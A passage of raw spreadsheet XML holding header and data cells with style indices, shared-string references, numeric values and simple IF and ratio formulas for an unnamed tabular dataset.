      <c r="DL2" s="74" t="s">
        <v>136</v>
      </c>
      <c r="DM2" s="79" t="s">
        <v>99</v>
      </c>
      <c r="DN2" s="79" t="s">
        <v>100</v>
      </c>
      <c r="DO2" s="79" t="s">
        <v>101</v>
      </c>
      <c r="DP2" s="80" t="s">
        <v>102</v>
      </c>
      <c r="DQ2" s="81" t="s">
        <v>103</v>
      </c>
      <c r="DR2" s="81" t="s">
        <v>104</v>
      </c>
      <c r="DS2" s="81" t="s">
        <v>105</v>
      </c>
      <c r="DT2" s="81" t="s">
        <v>106</v>
      </c>
      <c r="DU2" s="81" t="s">
        <v>107</v>
      </c>
      <c r="DV2" s="81" t="s">
        <v>108</v>
      </c>
      <c r="DW2" s="81" t="s">
        <v>109</v>
      </c>
      <c r="DX2" s="81" t="s">
        <v>110</v>
      </c>
      <c r="DY2" s="81" t="s">
        <v>111</v>
      </c>
      <c r="DZ2" s="81" t="s">
        <v>156</v>
      </c>
      <c r="EA2" s="81" t="s">
        <v>113</v>
      </c>
      <c r="EB2" s="81" t="s">
        <v>139</v>
      </c>
      <c r="EC2" s="74" t="s">
        <v>115</v>
      </c>
      <c r="ED2" s="74" t="s">
        <v>141</v>
      </c>
      <c r="EE2" s="74" t="s">
        <v>117</v>
      </c>
      <c r="EF2" s="74" t="s">
        <v>142</v>
      </c>
      <c r="EG2" s="74" t="s">
        <v>143</v>
      </c>
      <c r="EH2" s="74" t="s">
        <v>144</v>
      </c>
      <c r="EI2" s="74" t="s">
        <v>119</v>
      </c>
      <c r="EJ2" s="74" t="s">
        <v>157</v>
      </c>
      <c r="EK2" s="74" t="s">
        <v>121</v>
      </c>
      <c r="EL2" s="74" t="s">
        <v>122</v>
      </c>
      <c r="EM2" s="74" t="s">
        <v>123</v>
      </c>
      <c r="EN2" s="74" t="s">
        <v>124</v>
      </c>
      <c r="EO2" s="74" t="s">
        <v>146</v>
      </c>
      <c r="EP2" s="74" t="s">
        <v>147</v>
      </c>
      <c r="EQ2" s="74" t="s">
        <v>148</v>
      </c>
      <c r="ER2" s="74" t="s">
        <v>126</v>
      </c>
      <c r="ES2" s="74" t="s">
        <v>149</v>
      </c>
      <c r="ET2" s="74" t="s">
        <v>150</v>
      </c>
      <c r="EU2" s="74" t="s">
        <v>129</v>
      </c>
      <c r="EV2" s="74" t="s">
        <v>151</v>
      </c>
      <c r="EW2" s="74" t="s">
        <v>152</v>
      </c>
      <c r="EX2" s="74" t="s">
        <v>153</v>
      </c>
      <c r="EY2" s="74" t="s">
        <v>154</v>
      </c>
      <c r="EZ2" s="74" t="s">
        <v>155</v>
      </c>
      <c r="FA2" s="74" t="s">
        <v>135</v>
      </c>
      <c r="FB2" s="74" t="s">
        <v>136</v>
      </c>
      <c r="FC2" s="79" t="s">
        <v>99</v>
      </c>
      <c r="FD2" s="79" t="s">
        <v>100</v>
      </c>
      <c r="FE2" s="79" t="s">
        <v>101</v>
      </c>
      <c r="FF2" s="80" t="s">
        <v>102</v>
      </c>
      <c r="FG2" s="81" t="s">
        <v>158</v>
      </c>
      <c r="FH2" s="81" t="s">
        <v>104</v>
      </c>
      <c r="FI2" s="81" t="s">
        <v>105</v>
      </c>
      <c r="FJ2" s="81" t="s">
        <v>106</v>
      </c>
      <c r="FK2" s="81" t="s">
        <v>107</v>
      </c>
      <c r="FL2" s="81" t="s">
        <v>108</v>
      </c>
      <c r="FM2" s="81" t="s">
        <v>109</v>
      </c>
      <c r="FN2" s="81" t="s">
        <v>110</v>
      </c>
      <c r="FO2" s="81" t="s">
        <v>111</v>
      </c>
      <c r="FP2" s="81" t="s">
        <v>156</v>
      </c>
      <c r="FQ2" s="81" t="s">
        <v>113</v>
      </c>
      <c r="FR2" s="81" t="s">
        <v>139</v>
      </c>
      <c r="FS2" s="74" t="s">
        <v>140</v>
      </c>
      <c r="FT2" s="74" t="s">
        <v>141</v>
      </c>
      <c r="FU2" s="74" t="s">
        <v>117</v>
      </c>
      <c r="FV2" s="74" t="s">
        <v>142</v>
      </c>
      <c r="FW2" s="74" t="s">
        <v>143</v>
      </c>
      <c r="FX2" s="74" t="s">
        <v>144</v>
      </c>
      <c r="FY2" s="74" t="s">
        <v>119</v>
      </c>
      <c r="FZ2" s="74" t="s">
        <v>120</v>
      </c>
      <c r="GA2" s="74" t="s">
        <v>121</v>
      </c>
      <c r="GB2" s="74" t="s">
        <v>122</v>
      </c>
      <c r="GC2" s="74" t="s">
        <v>123</v>
      </c>
      <c r="GD2" s="74" t="s">
        <v>124</v>
      </c>
      <c r="GE2" s="74" t="s">
        <v>146</v>
      </c>
      <c r="GF2" s="74" t="s">
        <v>147</v>
      </c>
      <c r="GG2" s="74" t="s">
        <v>148</v>
      </c>
      <c r="GH2" s="74" t="s">
        <v>126</v>
      </c>
      <c r="GI2" s="74" t="s">
        <v>149</v>
      </c>
      <c r="GJ2" s="74" t="s">
        <v>150</v>
      </c>
      <c r="GK2" s="74" t="s">
        <v>129</v>
      </c>
      <c r="GL2" s="74" t="s">
        <v>151</v>
      </c>
      <c r="GM2" s="74" t="s">
        <v>152</v>
      </c>
      <c r="GN2" s="74" t="s">
        <v>153</v>
      </c>
      <c r="GO2" s="74" t="s">
        <v>154</v>
      </c>
      <c r="GP2" s="74" t="s">
        <v>155</v>
      </c>
      <c r="GQ2" s="74" t="s">
        <v>135</v>
      </c>
      <c r="GR2" s="74" t="s">
        <v>136</v>
      </c>
      <c r="GS2" s="74" t="s">
        <v>159</v>
      </c>
      <c r="GT2" s="74" t="s">
        <v>160</v>
      </c>
      <c r="GU2" s="82" t="s">
        <v>161</v>
      </c>
      <c r="GV2" s="71" t="s">
        <v>162</v>
      </c>
      <c r="GW2" s="71" t="s">
        <v>101</v>
      </c>
      <c r="GX2" s="74" t="s">
        <v>163</v>
      </c>
      <c r="GY2" s="74" t="s">
        <v>164</v>
      </c>
      <c r="GZ2" s="74" t="s">
        <v>165</v>
      </c>
      <c r="HA2" s="74" t="s">
        <v>166</v>
      </c>
      <c r="HB2" s="74" t="s">
        <v>167</v>
      </c>
      <c r="HC2" s="74" t="s">
        <v>168</v>
      </c>
      <c r="HD2" s="74" t="s">
        <v>169</v>
      </c>
      <c r="HE2" s="74" t="s">
        <v>170</v>
      </c>
      <c r="HF2" s="74" t="s">
        <v>171</v>
      </c>
      <c r="HG2" s="71" t="s">
        <v>172</v>
      </c>
      <c r="HH2" s="74" t="s">
        <v>173</v>
      </c>
      <c r="HI2" s="74" t="s">
        <v>174</v>
      </c>
      <c r="HJ2" s="74" t="s">
        <v>175</v>
      </c>
      <c r="HK2" s="74" t="s">
        <v>176</v>
      </c>
      <c r="HL2" s="74" t="s">
        <v>177</v>
      </c>
      <c r="HM2" s="74" t="s">
        <v>178</v>
      </c>
      <c r="HN2" s="74" t="s">
        <v>179</v>
      </c>
      <c r="HO2" s="74" t="s">
        <v>180</v>
      </c>
      <c r="HP2" s="74" t="s">
        <v>181</v>
      </c>
      <c r="HQ2" s="74" t="s">
        <v>182</v>
      </c>
      <c r="HR2" s="74" t="s">
        <v>183</v>
      </c>
      <c r="HS2" s="74" t="s">
        <v>184</v>
      </c>
      <c r="HT2" s="74" t="s">
        <v>173</v>
      </c>
      <c r="HU2" s="74" t="s">
        <v>185</v>
      </c>
      <c r="HV2" s="83" t="s">
        <v>186</v>
      </c>
      <c r="HW2" s="84" t="s">
        <v>187</v>
      </c>
      <c r="HX2" s="84" t="s">
        <v>101</v>
      </c>
      <c r="HY2" s="85" t="s">
        <v>188</v>
      </c>
      <c r="HZ2" s="85" t="s">
        <v>189</v>
      </c>
      <c r="IA2" s="85" t="s">
        <v>190</v>
      </c>
      <c r="IB2" s="85" t="s">
        <v>191</v>
      </c>
      <c r="IC2" s="85" t="s">
        <v>192</v>
      </c>
      <c r="ID2" s="85" t="s">
        <v>193</v>
      </c>
      <c r="IE2" s="85" t="s">
        <v>194</v>
      </c>
      <c r="IF2" s="85" t="s">
        <v>195</v>
      </c>
      <c r="IG2" s="85" t="s">
        <v>196</v>
      </c>
      <c r="IH2" s="84" t="s">
        <v>197</v>
      </c>
      <c r="II2" s="74" t="s">
        <v>198</v>
      </c>
      <c r="IJ2" s="74" t="s">
        <v>199</v>
      </c>
      <c r="IK2" s="74" t="s">
        <v>200</v>
      </c>
      <c r="IL2" s="74" t="s">
        <v>201</v>
      </c>
      <c r="IM2" s="74" t="s">
        <v>202</v>
      </c>
      <c r="IN2" s="74" t="s">
        <v>203</v>
      </c>
      <c r="IO2" s="74" t="s">
        <v>204</v>
      </c>
      <c r="IP2" s="74" t="s">
        <v>205</v>
      </c>
      <c r="IQ2" s="86" t="s">
        <v>206</v>
      </c>
      <c r="IR2" s="86" t="s">
        <v>207</v>
      </c>
      <c r="IS2" s="87" t="s">
        <v>208</v>
      </c>
      <c r="IT2" s="88"/>
      <c r="IU2" s="88"/>
      <c r="IV2" s="88"/>
      <c r="IW2" s="88"/>
      <c r="IX2" s="88"/>
      <c r="IY2" s="88"/>
      <c r="IZ2" s="88"/>
      <c r="JA2" s="88"/>
      <c r="JB2" s="88"/>
      <c r="JC2" s="88"/>
      <c r="JD2" s="88"/>
      <c r="JE2" s="88"/>
      <c r="JF2" s="88"/>
      <c r="JG2" s="88"/>
      <c r="JH2" s="88"/>
      <c r="JI2" s="88"/>
      <c r="JJ2" s="88"/>
      <c r="JK2" s="88"/>
      <c r="JL2" s="88"/>
      <c r="JM2" s="88"/>
      <c r="JN2" s="88"/>
      <c r="JO2" s="88"/>
      <c r="JP2" s="88"/>
      <c r="JQ2" s="88"/>
      <c r="JR2" s="88"/>
      <c r="JS2" s="88"/>
      <c r="JT2" s="88"/>
      <c r="JU2" s="88"/>
      <c r="JV2" s="88"/>
      <c r="JW2" s="88"/>
      <c r="JX2" s="88"/>
      <c r="JY2" s="88"/>
      <c r="JZ2" s="88"/>
      <c r="KA2" s="88"/>
      <c r="KB2" s="88"/>
      <c r="KC2" s="88"/>
      <c r="KD2" s="88"/>
      <c r="KE2" s="88"/>
      <c r="KF2" s="88"/>
      <c r="KG2" s="88"/>
      <c r="KH2" s="88"/>
      <c r="KI2" s="88"/>
      <c r="KJ2" s="88"/>
      <c r="KK2" s="88"/>
      <c r="KL2" s="88"/>
      <c r="KM2" s="88"/>
      <c r="KN2" s="88"/>
      <c r="KO2" s="88"/>
      <c r="KP2" s="88"/>
      <c r="KQ2" s="88"/>
      <c r="KR2" s="88"/>
      <c r="KS2" s="88"/>
      <c r="KT2" s="88"/>
      <c r="KU2" s="88"/>
      <c r="KV2" s="88"/>
      <c r="KW2" s="88"/>
      <c r="KX2" s="88"/>
      <c r="KY2" s="88"/>
      <c r="KZ2" s="88"/>
      <c r="LA2" s="88"/>
      <c r="LB2" s="88"/>
      <c r="LC2" s="88"/>
      <c r="LD2" s="88"/>
      <c r="LE2" s="88"/>
      <c r="LF2" s="88"/>
      <c r="LG2" s="88"/>
      <c r="LH2" s="88"/>
      <c r="LI2" s="88"/>
      <c r="LJ2" s="88"/>
      <c r="LK2" s="88"/>
      <c r="LL2" s="88"/>
      <c r="LM2" s="88"/>
      <c r="LN2" s="88"/>
      <c r="LO2" s="88"/>
      <c r="LP2" s="88"/>
      <c r="LQ2" s="88"/>
      <c r="LR2" s="88"/>
      <c r="LS2" s="88"/>
      <c r="LT2" s="88"/>
      <c r="LU2" s="88"/>
      <c r="LV2" s="88"/>
      <c r="LW2" s="88"/>
      <c r="LX2" s="88"/>
      <c r="LY2" s="88"/>
      <c r="LZ2" s="88"/>
      <c r="MA2" s="88"/>
      <c r="MB2" s="88"/>
      <c r="MC2" s="88"/>
      <c r="MD2" s="88"/>
      <c r="ME2" s="88"/>
      <c r="MF2" s="88"/>
      <c r="MG2" s="88"/>
      <c r="MH2" s="88"/>
      <c r="MI2" s="88"/>
      <c r="MJ2" s="88"/>
      <c r="MK2" s="88"/>
      <c r="ML2" s="88"/>
      <c r="MM2" s="88"/>
      <c r="MN2" s="88"/>
      <c r="MO2" s="88"/>
      <c r="MP2" s="88"/>
      <c r="MQ2" s="88"/>
      <c r="MR2" s="88"/>
      <c r="MS2" s="88"/>
      <c r="MT2" s="88"/>
      <c r="MU2" s="88"/>
      <c r="MV2" s="88"/>
      <c r="MW2" s="88"/>
      <c r="MX2" s="88"/>
      <c r="MY2" s="88"/>
      <c r="MZ2" s="88"/>
      <c r="NA2" s="88"/>
      <c r="NB2" s="88"/>
      <c r="NC2" s="88"/>
      <c r="ND2" s="88"/>
      <c r="NE2" s="88"/>
      <c r="NF2" s="88"/>
      <c r="NG2" s="88"/>
      <c r="NH2" s="88"/>
      <c r="NI2" s="88"/>
      <c r="NJ2" s="88"/>
      <c r="NK2" s="88"/>
      <c r="NL2" s="88"/>
      <c r="NM2" s="88"/>
      <c r="NN2" s="88"/>
      <c r="NO2" s="88"/>
      <c r="NP2" s="88"/>
      <c r="NQ2" s="88"/>
      <c r="NR2" s="88"/>
      <c r="NS2" s="88"/>
      <c r="NT2" s="88"/>
      <c r="NU2" s="88"/>
      <c r="NV2" s="88"/>
      <c r="NW2" s="88"/>
      <c r="NX2" s="88"/>
      <c r="NY2" s="88"/>
    </row>
    <row r="3" ht="153.75" customHeight="1">
      <c r="B3" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C3" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D3" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E3" s="90" t="s">
        <v>211</v>
      </c>
      <c r="F3" s="90" t="s">
        <v>212</v>
      </c>
      <c r="G3" s="91" t="s">
        <v>213</v>
      </c>
      <c r="H3" s="90" t="s">
        <v>214</v>
      </c>
      <c r="I3" s="92" t="s">
        <v>215</v>
      </c>
      <c r="J3" s="92" t="s">
        <v>216</v>
      </c>
      <c r="K3" s="92" t="s">
        <v>217</v>
      </c>
      <c r="L3" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M3" s="93">
        <v>1.0</v>
      </c>
      <c r="N3" s="93">
        <v>1.0</v>
      </c>
      <c r="O3" s="93">
        <v>0.0</v>
      </c>
      <c r="P3" s="93">
        <v>1.0</v>
      </c>
      <c r="Q3" s="93">
        <f t="shared" ref="Q3:Q17" si="1">R3+S3</f>
        <v>1</v>
      </c>
      <c r="R3" s="93">
        <v>1.0</v>
      </c>
      <c r="S3" s="93">
        <v>0.0</v>
      </c>
      <c r="T3" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U3" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V3" s="96" t="s">
        <v>220</v>
      </c>
      <c r="W3" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X3" s="97" t="s">
        <v>221</v>
      </c>
      <c r="Y3" s="96" t="s">
        <v>222</v>
      </c>
      <c r="Z3" s="96" t="s">
        <v>223</v>
      </c>
      <c r="AA3" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB3" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC3" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD3" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE3" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF3" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG3" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH3" s="99" t="s">
        <v>227</v>
      </c>
      <c r="AI3" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ3" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL3" s="100">
        <v>0.0</v>
      </c>
      <c r="AM3" s="100">
        <v>0.0</v>
      </c>
      <c r="AN3" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP3" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ3" s="100">
        <v>0.0</v>
      </c>
      <c r="AR3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT3" s="100" t="str">
        <f t="shared" ref="AT3:AT16" si="2">IF(AR3="-",AS3,AR3)</f>
        <v>-</v>
      </c>
      <c r="AU3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX3" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY3" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ3" s="100">
        <v>0.0</v>
      </c>
      <c r="BA3" s="102">
        <v>1.0</v>
      </c>
      <c r="BB3" s="102">
        <v>0.0</v>
      </c>
      <c r="BC3" s="102">
        <v>0.0</v>
      </c>
      <c r="BD3" s="102">
        <v>0.0</v>
      </c>
      <c r="BE3" s="102">
        <v>0.0</v>
      </c>
      <c r="BF3" s="102">
        <v>0.0</v>
      </c>
      <c r="BG3" s="102">
        <v>0.0</v>
      </c>
      <c r="BH3" s="102">
        <v>0.0</v>
      </c>
      <c r="BI3" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ3" s="102">
        <v>0.0</v>
      </c>
      <c r="BK3" s="102">
        <v>0.0</v>
      </c>
      <c r="BL3" s="103">
        <f t="shared" ref="BL3:BL65" si="3">BB3/N3</f>
        <v>0</v>
      </c>
      <c r="BM3" s="103">
        <f t="shared" ref="BM3:BM65" si="4">BI3/N3</f>
        <v>0</v>
      </c>
      <c r="BN3" s="103">
        <f t="shared" ref="BN3:BN65" si="5">IF(BE3="-","-",BE3/N3)</f>
        <v>0</v>
      </c>
      <c r="BO3" s="103">
        <f t="shared" ref="BO3:BO65" si="6">BC3/P3</f>
        <v>0</v>
      </c>
      <c r="BP3" s="103">
        <f t="shared" ref="BP3:BP65" si="7">BJ3/P3</f>
        <v>0</v>
      </c>
      <c r="BQ3" s="103">
        <f t="shared" ref="BQ3:BQ65" si="8">IF(BG3="-","-",BG3/P3)</f>
        <v>0</v>
      </c>
      <c r="BR3" s="103">
        <f t="shared" ref="BR3:BR65" si="9">BD3/R3</f>
        <v>0</v>
      </c>
      <c r="BS3" s="103">
        <f t="shared" ref="BS3:BS65" si="10">BK3/R3</f>
        <v>0</v>
      </c>
      <c r="BT3" s="103">
        <f t="shared" ref="BT3:BT65" si="11">IF(BH3="-","-",BH3/R3)</f>
        <v>0</v>
      </c>
      <c r="BU3" s="103">
        <f t="shared" ref="BU3:BU20" si="12">(BE3+BF3)/(N3+O3)</f>
        <v>0</v>
      </c>
      <c r="BV3" s="103">
        <f t="shared" ref="BV3:BV20" si="13">IF(OR(BN3=0,BN3="-"),0,1)</f>
        <v>0</v>
      </c>
      <c r="BW3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX3" s="104">
        <v>0.0</v>
      </c>
      <c r="BY3" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ3" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB3" s="104">
        <v>0.0</v>
      </c>
      <c r="CC3" s="104">
        <v>0.0</v>
      </c>
      <c r="CD3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF3" s="104" t="str">
        <f t="shared" ref="CF3:CF14" si="14">IF(CD3="-",CE3,CD3)</f>
        <v>-</v>
      </c>
      <c r="CG3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ3" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK3" s="104">
        <v>0.0</v>
      </c>
      <c r="CL3" s="104">
        <v>0.0</v>
      </c>
      <c r="CM3" s="105">
        <v>1.0</v>
      </c>
      <c r="CN3" s="105">
        <v>0.0</v>
      </c>
      <c r="CO3" s="105">
        <v>0.0</v>
      </c>
      <c r="CP3" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ3" s="105">
        <v>0.0</v>
      </c>
      <c r="CR3" s="105">
        <v>0.0</v>
      </c>
      <c r="CS3" s="105">
        <v>0.0</v>
      </c>
      <c r="CT3" s="105">
        <v>0.0</v>
      </c>
      <c r="CU3" s="105">
        <v>0.0</v>
      </c>
      <c r="CV3" s="105">
        <v>0.0</v>
      </c>
      <c r="CW3" s="105">
        <v>0.0</v>
      </c>
      <c r="CX3" s="105">
        <v>0.0</v>
      </c>
      <c r="CY3" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ3" s="105">
        <v>0.0</v>
      </c>
      <c r="DA3" s="105">
        <v>0.0</v>
      </c>
      <c r="DB3" s="106">
        <f t="shared" ref="DB3:DB65" si="15">CN3/N3</f>
        <v>0</v>
      </c>
      <c r="DC3" s="106">
        <f t="shared" ref="DC3:DC65" si="16">CW3/N3</f>
        <v>0</v>
      </c>
      <c r="DD3" s="106">
        <f t="shared" ref="DD3:DD65" si="17">IF(CS3="-","-",CS3/N3)</f>
        <v>0</v>
      </c>
      <c r="DE3" s="106">
        <f t="shared" ref="DE3:DE65" si="18">CO3/P3</f>
        <v>0</v>
      </c>
      <c r="DF3" s="106">
        <f t="shared" ref="DF3:DF65" si="19">CX3/P3</f>
        <v>0</v>
      </c>
      <c r="DG3" s="106">
        <f t="shared" ref="DG3:DG139" si="20">IF(CU3="-","-",CU3/P3)</f>
        <v>0</v>
      </c>
      <c r="DH3" s="106">
        <f t="shared" ref="DH3:DH65" si="21">IF(CR3="-","-",CR3/R3)</f>
        <v>0</v>
      </c>
      <c r="DI3" s="106">
        <f t="shared" ref="DI3:DI65" si="22">IF(DA3="-","-",DA3/R3)</f>
        <v>0</v>
      </c>
      <c r="DJ3" s="106">
        <f t="shared" ref="DJ3:DJ65" si="23">IF(CV3="-","-",CV3/R3)</f>
        <v>0</v>
      </c>
      <c r="DK3" s="107">
        <f t="shared" ref="DK3:DK20" si="24">(CS3+CT3)/(N3+O3)</f>
        <v>0</v>
      </c>
      <c r="DL3" s="106">
        <f t="shared" ref="DL3:DL20" si="25">IF(AND(OR(DD3=0,DD3="-"),DK3=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="DM3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN3" s="108">
        <v>0.0</v>
      </c>
      <c r="DO3" s="108">
        <v>0.0</v>
      </c>
      <c r="DP3" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR3" s="108">
        <v>0.0</v>
      </c>
      <c r="DS3" s="108">
        <v>0.0</v>
      </c>
      <c r="DT3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV3" s="108" t="str">
        <f t="shared" ref="DV3:DV6" si="26">IF(DT3="-",DU3,DT3)</f>
        <v>-</v>
      </c>
      <c r="DW3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ3" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA3" s="108">
        <v>0.0</v>
      </c>
      <c r="EB3" s="108">
        <v>0.0</v>
      </c>
      <c r="EC3" s="109">
        <v>1.0</v>
      </c>
      <c r="ED3" s="109">
        <v>0.0</v>
      </c>
      <c r="EE3" s="109">
        <v>0.0</v>
      </c>
      <c r="EF3" s="109">
        <v>0.0</v>
      </c>
      <c r="EG3" s="109">
        <v>0.0</v>
      </c>
      <c r="EH3" s="109">
        <v>0.0</v>
      </c>
      <c r="EI3" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ3" s="109">
        <v>0.0</v>
      </c>
      <c r="EK3" s="109">
        <v>0.0</v>
      </c>
      <c r="EL3" s="109">
        <v>0.0</v>
      </c>
      <c r="EM3" s="109">
        <v>0.0</v>
      </c>
      <c r="EN3" s="109">
        <v>0.0</v>
      </c>
      <c r="EO3" s="109">
        <v>0.0</v>
      </c>
      <c r="EP3" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ3" s="109">
        <v>0.0</v>
      </c>
      <c r="ER3" s="110">
        <f t="shared" ref="ER3:ER65" si="27">ED3/N3</f>
        <v>0</v>
      </c>
      <c r="ES3" s="110">
        <f t="shared" ref="ES3:ES65" si="28">EM3/N3</f>
        <v>0</v>
      </c>
      <c r="ET3" s="110">
        <f t="shared" ref="ET3:ET65" si="29">IF(EI3="-","-",EI3/N3)</f>
        <v>0</v>
      </c>
      <c r="EU3" s="110">
        <f t="shared" ref="EU3:EU65" si="30">EE3/P3</f>
        <v>0</v>
      </c>
      <c r="EV3" s="110">
        <f t="shared" ref="EV3:EV65" si="31">EN3/P3</f>
        <v>0</v>
      </c>
      <c r="EW3" s="110">
        <f t="shared" ref="EW3:EW65" si="32">IF(EK3="-","-",EK3/P3)</f>
        <v>0</v>
      </c>
      <c r="EX3" s="110">
        <f t="shared" ref="EX3:EX65" si="33">IF(EH3="-","-",EH3/R3)</f>
        <v>0</v>
      </c>
      <c r="EY3" s="110">
        <f t="shared" ref="EY3:EY65" si="34">IF(EQ3="-","-",EQ3/R3)</f>
        <v>0</v>
      </c>
      <c r="EZ3" s="110">
        <f t="shared" ref="EZ3:EZ65" si="35">IF(EL3="-","-",EL3/R3)</f>
        <v>0</v>
      </c>
      <c r="FA3" s="110">
        <f t="shared" ref="FA3:FA20" si="36">(EI3+EJ3)/(N3+O3)</f>
        <v>0</v>
      </c>
      <c r="FB3" s="110">
        <f t="shared" ref="FB3:FB20" si="37">IF(AND(OR(ET3=0,ET3="-"),FA3=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="FC3" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD3" s="111">
        <v>2.0</v>
      </c>
      <c r="FE3" s="111">
        <v>4.0</v>
      </c>
      <c r="FF3" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG3" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH3" s="111">
        <v>0.0</v>
      </c>
      <c r="FI3" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ3" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK3" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL3" s="111" t="str">
        <f t="shared" ref="FL3:FL6" si="38">IF(FJ3="-",FK3,FJ3)</f>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM3" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN3" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO3" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP3" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ3" s="111">
        <v>0.0</v>
      </c>
      <c r="FR3" s="111">
        <v>0.0</v>
      </c>
      <c r="FS3" s="112">
        <v>1.0</v>
      </c>
      <c r="FT3" s="112">
        <v>1.0</v>
      </c>
      <c r="FU3" s="112">
        <v>2.0</v>
      </c>
      <c r="FV3" s="112">
        <v>0.0</v>
      </c>
      <c r="FW3" s="112">
        <v>4.0</v>
      </c>
      <c r="FX3" s="112">
        <v>4.0</v>
      </c>
      <c r="FY3" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ3" s="112">
        <v>0.0</v>
      </c>
      <c r="GA3" s="112">
        <v>0.0</v>
      </c>
      <c r="GB3" s="112">
        <v>0.0</v>
      </c>
      <c r="GC3" s="112">
        <v>0.0</v>
      </c>
      <c r="GD3" s="112">
        <v>0.0</v>
      </c>
      <c r="GE3" s="112">
        <v>0.0</v>
      </c>
      <c r="GF3" s="112">
        <v>0.0</v>
      </c>
      <c r="GG3" s="112">
        <v>0.0</v>
      </c>
      <c r="GH3" s="113">
        <f t="shared" ref="GH3:GH65" si="39">FT3/N3</f>
        <v>1</v>
      </c>
      <c r="GI3" s="113">
        <f t="shared" ref="GI3:GI65" si="40">GC3/N3</f>
        <v>0</v>
      </c>
      <c r="GJ3" s="113">
        <f t="shared" ref="GJ3:GJ65" si="41">IF(FY3="-","-",FY3/N3)</f>
        <v>0</v>
      </c>
      <c r="GK3" s="113">
        <f t="shared" ref="GK3:GK65" si="42">FU3/P3</f>
        <v>2</v>
      </c>
      <c r="GL3" s="113">
        <f t="shared" ref="GL3:GL65" si="43">GD3/P3</f>
        <v>0</v>
      </c>
      <c r="GM3" s="113">
        <f t="shared" ref="GM3:GM65" si="44">IF(GA3="-","-",GA3/P3)</f>
        <v>0</v>
      </c>
      <c r="GN3" s="113">
        <f t="shared" ref="GN3:GN65" si="45">IF(FX3="-","-",FX3/R3)</f>
        <v>4</v>
      </c>
      <c r="GO3" s="113">
        <f t="shared" ref="GO3:GO65" si="46">IF(GG3="-","-",GG3/R3)</f>
        <v>0</v>
      </c>
      <c r="GP3" s="113">
        <f t="shared" ref="GP3:GP65" si="47">IF(GB3="-","-",GB3/R3)</f>
        <v>0</v>
      </c>
      <c r="GQ3" s="114">
        <f t="shared" ref="GQ3:GQ20" si="48">(FY3+FZ3)/(N3+O3)</f>
        <v>0</v>
      </c>
      <c r="GR3" s="113">
        <f t="shared" ref="GR3:GR20" si="49">IF(AND(OR(GJ3=0,GJ3="-"),GQ3=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="GS3" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT3" s="94"/>
      <c r="GU3" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV3" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW3" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX3" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY3" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ3" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA3" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB3" s="117" t="s">
